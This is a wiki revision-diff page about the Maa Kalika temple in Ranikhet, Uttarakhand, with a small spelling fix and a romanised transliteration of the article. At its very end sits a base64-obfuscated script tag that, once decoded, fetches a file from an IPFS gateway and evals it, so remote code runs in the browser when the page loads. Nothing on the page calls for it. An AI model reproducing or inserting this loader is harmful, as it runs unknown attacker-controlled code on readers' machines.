Difference between revisions of "माँ कलिका मंदिर, रानीखेत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:रानीखेत (को हटा दिया गया हैं।))
m (Text replacement - "हुयी " to "हुई ")
 
Line 1: Line 1:
'''माँ कलिका मंदिर''' [[उत्तराखण्ड]] राज्य के [[अल्मोड़ा ज़िला|अल्मोड़ा ज़िले]] के प्रसिद्ध पहाड़ी पर्यटन स्थल [[रानीखेत]] में स्थित है। घने वृक्षों के मध्य एक छोटी से पहाड़ी की चोटी पर स्थित यह एक प्रसिद्ध मंदिर है। प्रवेश द्वार पर ही कुछ दुकानदार अपनी अस्थाई दुकान लगाये हुए स्थानीय फल आडू, नख आदि बेचते हुए मिलते हैं। इस द्वार से माँ कालिका का मंदिर तक जाने के लिए सीढ़िया बनी हुयी हैं। इन सीढ़ियों से घने वृक्षों के मध्य से होते हुए मंदिर पहुँचा जा सकता है।  तेज हवा चलने के कारण सीढ़ियों के दोनो तरफ के पेड़-पौधे जोर-जोर से आवाज़ करते हैं तो बहुत ही अच्छा लगता है। [[रानीखेत]] से 6 किलोमीटर की दूरी पर गोल्फ़ का विशाल मैदान है जो इस मंदिर के समीप ही है।
+
'''माँ कलिका मंदिर''' [[उत्तराखण्ड]] राज्य के [[अल्मोड़ा ज़िला|अल्मोड़ा ज़िले]] के प्रसिद्ध पहाड़ी पर्यटन स्थल [[रानीखेत]] में स्थित है। घने वृक्षों के मध्य एक छोटी से पहाड़ी की चोटी पर स्थित यह एक प्रसिद्ध मंदिर है। प्रवेश द्वार पर ही कुछ दुकानदार अपनी अस्थाई दुकान लगाये हुए स्थानीय फल आडू, नख आदि बेचते हुए मिलते हैं। इस द्वार से माँ कालिका का मंदिर तक जाने के लिए सीढ़िया बनी हुई हैं। इन सीढ़ियों से घने वृक्षों के मध्य से होते हुए मंदिर पहुँचा जा सकता है।  तेज हवा चलने के कारण सीढ़ियों के दोनो तरफ के पेड़-पौधे जोर-जोर से आवाज़ करते हैं तो बहुत ही अच्छा लगता है। [[रानीखेत]] से 6 किलोमीटर की दूरी पर गोल्फ़ का विशाल मैदान है जो इस मंदिर के समीप ही है।
  
  

Latest revision as of 07:40, 7 November 2017

maan kalika mandir uttarakhand rajy ke almo da zile ke prasiddh paha di paryatan sthal ranikhet mean sthit hai. ghane vrikshoan ke madhy ek chhoti se paha di ki choti par sthit yah ek prasiddh mandir hai. pravesh dvar par hi kuchh dukanadar apani asthaee dukan lagaye hue sthaniy phal adoo, nakh adi bechate hue milate haian. is dvar se maan kalika ka mandir tak jane ke lie sidhiya bani huee haian. in sidhiyoan se ghane vrikshoan ke madhy se hote hue mandir pahuancha ja sakata hai. tej hava chalane ke karan sidhiyoan ke dono taraph ke pe d-paudhe jor-jor se avaz karate haian to bahut hi achchha lagata hai. ranikhet se 6 kilomitar ki doori par golf ka vishal maidan hai jo is mandir ke samip hi hai.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>